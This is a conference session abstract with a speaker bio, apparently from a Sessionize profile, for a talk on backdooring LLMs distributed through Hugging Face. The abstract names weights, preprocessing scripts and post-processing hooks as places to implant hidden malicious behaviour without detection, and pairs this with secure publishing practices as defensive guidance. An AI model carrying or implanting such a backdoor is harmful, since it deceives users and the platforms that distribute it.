Session
Backdooring LLMs on Hugging Face: Secure Coding Lessons
The rapid adoption of large language models (LLMs) and the widespread use of open platforms like Hugging Face have introduced new security challenges, particularly in model integrity and supply chain vulnerabilities. This talk explores the feasibility and methodology of backdooring LLMs distributed via Hugging Face, highlighting how subtle code or model manipulations can lead to hidden malicious behavior. Through practical demonstrations, we uncover how backdoors can be implanted in model weights, preprocessing scripts, or post-processing hooks—often without detection. We then transition into secure coding practices and model publishing guidelines aimed at mitigating these risks. By analyzing real-world scenarios and providing actionable recommendations, this work serves both as a cautionary exploration and a guide for developers, researchers, and platform maintainers to adopt more secure practices in the era of open LLM sharing.

Davide Cioccia
Founder at DCODX Cybersecurity and Chief Product Officer at SecDim.
Amsterdam, The Netherlands
Links
Please note that Sessionize is not responsible for the accuracy or validity of the data provided by speakers. If you suspect this profile to be fake or spam, please let us know.
Jump to top